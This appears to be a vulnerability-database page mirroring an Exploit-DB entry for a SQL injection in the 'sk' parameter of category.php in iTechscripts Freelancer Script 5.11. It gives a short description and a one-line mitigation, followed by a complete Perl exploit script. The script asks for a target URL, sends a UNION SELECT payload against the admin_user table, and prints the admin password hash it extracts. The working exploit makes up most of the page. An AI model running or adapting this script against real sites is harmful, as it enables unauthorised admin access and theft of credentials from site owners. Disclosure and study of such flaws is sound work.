header-logo
Suggest Exploit
vendor:
Freelancer Script
by:
v3n0m
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Freelancer Script
Affected Version From: 5.11
Affected Version To: 5.11
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017

iTechscripts Freelancer Script v5.11 (sk) SQL Injection Vulnerability

A SQL injection vulnerability exists in iTechscripts Freelancer Script v5.11 (sk) which allows an attacker to gain access to the admin panel of the application. The vulnerability is due to the lack of proper input validation in the 'sk' parameter of the 'category.php' page. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter. This can allow the attacker to gain access to the admin panel of the application.

Mitigation:

Input validation should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#!/usr/bin/perl -w

# iTechscripts Freelancer Script v5.11 (sk) SQL Injection Vulnerability
# Author	: v3n0m
# Contact	: v3n0m[at]outlook[dot]com
# Date		: January, 11-2017 GMT +7:00 Jakarta, Indonesia
# Software	: Freelancer Script
# Version	: 5.11 Lower versions may also be affected
# Price 	: US$199.00
# Link  	: http://itechscripts.com/freelancer-script/
# Greetz	: YOGYACARDERLINK, CAFE BMW, Dhea Fathin Karima & YOU !!
sub clear{
	system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}
clear();
print "|----------------------------------------------------|\n";
print "| iTechscripts Freelancer Script 5.11 SQLi Exploiter |\n";
print "| Coded by : v3n0m                                   |\n";
print "| Greetz   : YOGYACARDERLINK                         |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nInsert Target:[http://wwww.target.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
$concat="group_concat(username,char(58),password)";
$table="admin_user";
$dheakarima = LWP::UserAgent->new() or die "Could not initalize browser\n";
$dheakarima->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "category.php?sk=-9999+union+all+select+null,null,".$concat.",null+from/**/".$table."+--+";
$xf2r = $dheakarima->request(HTTP::Request->new(GET=>$host));
$answer = $xf2r->content; 
if ($answer =~/([0-9a-fA-F]{32})/) {
	print "\n[+] Admin Password : $1\n";
	print "[+] Success !! Check target for details...\n";
	print "\n";
}
else{print "\n[-] Failed\n";
}

Navigation

Suggest Exploit

Services By CQR